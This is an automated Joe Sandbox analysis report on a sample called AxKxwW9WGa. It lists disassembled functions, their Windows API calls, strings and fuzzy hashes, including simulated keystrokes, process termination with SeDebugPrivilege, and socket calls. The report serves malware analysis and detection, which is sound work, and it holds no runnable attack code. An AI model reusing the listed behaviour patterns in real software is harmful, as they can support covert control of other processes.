Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 6c76b573744f73703da321f5e1f16ef1cdc1eec8590b91690ea04bd3a055dbc8
Instruction ID: 8ccecc63ab7e33720e89d05ef59bc4f5e1b9439291505e2c8673707512278b46
Opcode Fuzzy Hash: 6c76b573744f73703da321f5e1f16ef1cdc1eec8590b91690ea04bd3a055dbc8
Instruction Fuzzy Hash: AE51C738600204BEEFA09B25CC89FAE7B65FB05314F60412FF910D66E1DF79A980DB59

Function 00442B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0047C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0047C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0047C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0047C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0047C370
DestroyIcon.USER32(00000000), ref: 0047C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0047C39C
DestroyIcon.USER32(?), ref: 0047C3AB

Part of subcall function 004CA4AF: DeleteObject.GDI32(00000000), ref: 004CA4E8

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 7171eb2befbdb277afa91d2bb5e23fe583e0807c528801e537a2e633e100fc6c
Instruction ID: 5ccdf657c86baab73ffadec6b08fe593c50b3ccf1c5b9eaa9a76ad00feb8491a
Opcode Fuzzy Hash: 7171eb2befbdb277afa91d2bb5e23fe583e0807c528801e537a2e633e100fc6c
Instruction Fuzzy Hash: 8A517A70A00205EFEB20DF65CD85FAB3BA5EB58310F50852EF90697290D7B8AD91DB58

Function 0049966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0049A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0049A84C
Part of subcall function 0049A82C: GetCurrentThreadId.KERNEL32 ref: 0049A853
Part of subcall function 0049A82C: AttachThreadInput.USER32(00000000,?,00499683,?,00000001), ref: 0049A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 0049968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004996AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004996AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 004996B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004996D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004996D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 004996E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004996F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004996FB

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 36ccca592a65536fef52dd8da6c65e8dd5eea97918d2fea8e42842c35fbf6b65
Instruction ID: d1bc74e4d78f624119e3da07d64a4edc95e2d7dc201166933509c01444eeaa30
Opcode Fuzzy Hash: 36ccca592a65536fef52dd8da6c65e8dd5eea97918d2fea8e42842c35fbf6b65
Instruction Fuzzy Hash: BB11E571A10618BEFA106F65DC49F6A3F1EDB4C794F11043AF644AB0A0C9F75C11DAA8

Function 00498921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0049853C,00000B00,?,?), ref: 0049892A
HeapAlloc.KERNEL32(00000000,?,0049853C,00000B00,?,?), ref: 00498931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0049853C,00000B00,?,?), ref: 00498946
GetCurrentProcess.KERNEL32(?,00000000,?,0049853C,00000B00,?,?), ref: 0049894E
DuplicateHandle.KERNEL32(00000000,?,0049853C,00000B00,?,?), ref: 00498951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0049853C,00000B00,?,?), ref: 00498961
GetCurrentProcess.KERNEL32(0049853C,00000000,?,0049853C,00000B00,?,?), ref: 00498969
DuplicateHandle.KERNEL32(00000000,?,0049853C,00000B00,?,?), ref: 0049896C
CreateThread.KERNEL32(00000000,00000000,00498992,00000000,00000000,00000000), ref: 00498986

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: b712990031d726669268d60ca029925b2f455a2c3136d60196fbc3cbbe9184c3
Instruction ID: e6280026de4b6c26fc3e2532e36464302d8b75763c1fa1bdef5335471667e4a6
Opcode Fuzzy Hash: b712990031d726669268d60ca029925b2f455a2c3136d60196fbc3cbbe9184c3
Instruction Fuzzy Hash: AB01BBB5240308FFE750ABA5DC4DF6B7BADEB89711F448421FA05DB1A1CA759C04CB24

Function 004B9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 004B9BA4, 004B9EC8
Not an Object type, xrefs: 004B9B7B

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 6fa635576590aca8aeed44719cf702b9fa512536b9d12f5458150119dc102e11
Instruction ID: f711a1ca830b13b69a4ee089a304dd2ec11cac33175f1f717389ec6e4d962ab8
Opcode Fuzzy Hash: 6fa635576590aca8aeed44719cf702b9fa512536b9d12f5458150119dc102e11
Instruction Fuzzy Hash: 85C19271A002199BDF14CF59C884BEEB7F5BB48314F14846EEA05AB381E778ED45CB68

Function 004B975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 0049710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00497044,80070057,?,?,?,00497455), ref: 00497127
Part of subcall function 0049710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00497044,80070057,?,?), ref: 00497142
Part of subcall function 0049710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00497044,80070057,?,?), ref: 00497150
Part of subcall function 0049710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00497044,80070057,?), ref: 00497160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 004B9806
_memset.LIBCMT ref: 004B9813
_memset.LIBCMT ref: 004B9956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 004B9982
CoTaskMemFree.OLE32(?), ref: 004B998D

Strings

NULL Pointer assignment, xrefs: 004B99DB

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: f2475610123fb5600707c62ba6fa2f8c7f8efe29780031131ea60818537e1455
Instruction ID: f7923b64beeb63817bcbdaa66f9f99b16f8882f65ce8343ba2b54fa9b83383ff
Opcode Fuzzy Hash: f2475610123fb5600707c62ba6fa2f8c7f8efe29780031131ea60818537e1455
Instruction Fuzzy Hash: 72915971D00228EBDF10DFA5CC81EDEBBB9AF08714F20406AF519A7281DB759A44CFA4

Function 004C6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004C6E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 004C6E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004C6E52
_wcscat.LIBCMT ref: 004C6EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 004C6EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 004C6EF2

Strings

SysListView32, xrefs: 004C6DF6

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 4e8676339fc8866e150a147ea2397fe8198f3b24f8f30fe1265fe1bd6058a1a0
Instruction ID: eba9ee23ad17a3d68412ab7f0e0ac0a2e9f1ba180ed2b81470540efc4c521ed8
Opcode Fuzzy Hash: 4e8676339fc8866e150a147ea2397fe8198f3b24f8f30fe1265fe1bd6058a1a0
Instruction Fuzzy Hash: 1441D078A00308ABEB218F64CC85FEF77A9EF08354F11442FF585E7291D6799D848B68

Function 004BE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 004A3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 004A3C7A
Part of subcall function 004A3C55: Process32FirstW.KERNEL32(00000000,?), ref: 004A3C88
Part of subcall function 004A3C55: CloseHandle.KERNEL32(00000000), ref: 004A3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 004BE9A4
GetLastError.KERNEL32 ref: 004BE9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004BE9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 004BEA63
GetLastError.KERNEL32(00000000), ref: 004BEA6E
CloseHandle.KERNEL32(00000000), ref: 004BEAA3

Strings

SeDebugPrivilege, xrefs: 004BE9C2

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: b58d1fa730a18d2c929109c41bc8056d0ccd6377ed87f175c273c6b551c38c57
Instruction ID: 1634770f13fb33fe3e1ba949aced242a3dba6b56933d676117bb58c8227d7d64
Opcode Fuzzy Hash: b58d1fa730a18d2c929109c41bc8056d0ccd6377ed87f175c273c6b551c38c57
Instruction Fuzzy Hash: 7C41A2712002009FDB10EF55CC95FAEBBA5AF84314F14846EF9025B3D2DB79AC09CB59

Function 004A2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 004A3033

Strings

blank, xrefs: 004A2FB5
stop, xrefs: 004A3004
info, xrefs: 004A2FD4
question, xrefs: 004A2FEC
warning, xrefs: 004A301C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 5392ba653118d57ebd28723fcd45017640672f80ea6c91ff5ef3db8710aad011
Instruction ID: db437c1b2f31f7cf1eaf848bff79ef1d35673d0ec76b09409785c64139e9f711
Opcode Fuzzy Hash: 5392ba653118d57ebd28723fcd45017640672f80ea6c91ff5ef3db8710aad011
Instruction Fuzzy Hash: E311263534C74ABEE7149F14DC42DAB679C9F2B325B20002FFA006A281FAAD5E4055AE

Function 004A42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004A4312
LoadStringW.USER32(00000000), ref: 004A4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004A432F
LoadStringW.USER32(00000000), ref: 004A4336
_wprintf.LIBCMT ref: 004A435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 004A437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 004A4357

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 9615cbd4624b3e66658ac83ebec7e33b4a9428d533177aa6358a507c631df7b4
Instruction ID: 660162da85532c047eafd56d2cbd1436dea8891b8837a4c93e4e3744ccdf42bd
Opcode Fuzzy Hash: 9615cbd4624b3e66658ac83ebec7e33b4a9428d533177aa6358a507c631df7b4
Instruction Fuzzy Hash: 3D0167F6900208BFD7519B90DD89FFB776CD708301F0005B6BB45E6051EA785E894B79

Function 004CD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00442612: GetWindowLongW.USER32(?,000000EB), ref: 00442623

GetSystemMetrics.USER32(0000000F), ref: 004CD47C
GetSystemMetrics.USER32(0000000F), ref: 004CD49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 004CD6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004CD6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004CD716
ShowWindow.USER32(00000003,00000000), ref: 004CD735
InvalidateRect.USER32(?,00000000,00000001), ref: 004CD75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 004CD77D

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 356371f26e5d4bb50a05eaf3a0581431d75a35040eaaa168bdffc1bf6a28c812
Instruction ID: 42f69e7b05ebe1a1e2e72212030659347d44e1018ed41de0075fcf8e8ca384eb
Opcode Fuzzy Hash: 356371f26e5d4bb50a05eaf3a0581431d75a35040eaaa168bdffc1bf6a28c812
Instruction Fuzzy Hash: 92B18B79A00225EBDF54CF68C985BAE7BB1BF04701F08807AED489B295D738A954CB58

Function 00442A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0047C1C7,00000004,00000000,00000000,00000000), ref: 00442ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0047C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00442B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0047C1C7,00000004,00000000,00000000,00000000), ref: 0047C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0047C1C7,00000004,00000000,00000000,00000000), ref: 0047C286

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: c641b1ac6e1e9781851f0e1c3193d939cafd148639153cd490b24b7e264bf4ee
Instruction ID: a59d8b184736c3a73a54c6f929f981339920950cf4c1ac26ab79f7c261203959
Opcode Fuzzy Hash: c641b1ac6e1e9781851f0e1c3193d939cafd148639153cd490b24b7e264bf4ee
Instruction Fuzzy Hash: B5412E306047809AFB758B288ECCB6B7B92EB45300F94C85FF44762661C6FCA846D71D

Function 004A70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 004A70DD

Part of subcall function 00460DB6: std::exception::exception.LIBCMT ref: 00460DEC
Part of subcall function 00460DB6: __CxxThrowException@8.LIBCMT ref: 00460E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 004A7114
EnterCriticalSection.KERNEL32(?), ref: 004A7130
_memmove.LIBCMT ref: 004A717E
_memmove.LIBCMT ref: 004A719B
LeaveCriticalSection.KERNEL32(?), ref: 004A71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004A71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 004A71DE

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 21725281ae8c8ca7111c77afc428b46f1bfe225bcb416c5f75f04b7097761d49
Instruction ID: 6d33cce577839b3e878dc7f7a381d7bfb9fedb24c4d965eccf10a964b3e17c62
Opcode Fuzzy Hash: 21725281ae8c8ca7111c77afc428b46f1bfe225bcb416c5f75f04b7097761d49
Instruction Fuzzy Hash: 96319071900205EBCB50DFA5DC85EAFB7B9EF45310F1441BAE9049B246EB389E14CBA9

Function 004C61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004C61EB
GetDC.USER32(00000000), ref: 004C61F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004C61FE
ReleaseDC.USER32(00000000,00000000), ref: 004C620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 004C6246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004C6257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,004C902A,?,?,000000FF,00000000,?,000000FF,?), ref: 004C6291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004C62B1

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 0789dc0469899bd807235fa7f43cf62591c7bfe50b9ea47f1763b64b981b8a44
Instruction ID: 19cb5c25253d7eb9a274e5335b202fd94c85df76a951541be1f987b3cd6c853d
Opcode Fuzzy Hash: 0789dc0469899bd807235fa7f43cf62591c7bfe50b9ea47f1763b64b981b8a44
Instruction Fuzzy Hash: A7319F76201210BFEB519F50CC8AFEB3BAEEF49765F044065FE089A291C6799C41CB68

Function 004AEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00449837: __itow.LIBCMT ref: 00449862
Part of subcall function 00449837: __swprintf.LIBCMT ref: 004498AC

Part of subcall function 0045FC86: _wcscpy.LIBCMT ref: 0045FCA9

_wcstok.LIBCMT ref: 004AEC94
_wcscpy.LIBCMT ref: 004AED23
_memset.LIBCMT ref: 004AED56

Strings

X, xrefs: 004AED93

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 4df6b07f41f8e4989014d146d20445c4d9d98408c3e968015ca12bce2996443c
Instruction ID: 5b07751ad4bb5c7dc7d27272ebce70c7122410db531cb84e234a6be2cee52bfe
Opcode Fuzzy Hash: 4df6b07f41f8e4989014d146d20445c4d9d98408c3e968015ca12bce2996443c
Instruction Fuzzy Hash: 36C191715083419FD764EF25C881A5BB7E0FF95314F00492EF8999B2A2DB38EC45CB4A

Function 004B6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 004B6C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004B6C21
WSAGetLastError.WSOCK32(00000000), ref: 004B6C34
htons.WSOCK32(?,?,?,00000000,?), ref: 004B6CEA
inet_ntoa.WSOCK32(?), ref: 004B6CA7

Part of subcall function 0049A7E9: _strlen.LIBCMT ref: 0049A7F3
Part of subcall function 0049A7E9: _memmove.LIBCMT ref: 0049A815

_strlen.LIBCMT ref: 004B6D44
_memmove.LIBCMT ref: 004B6DAD

Memory Dump Source

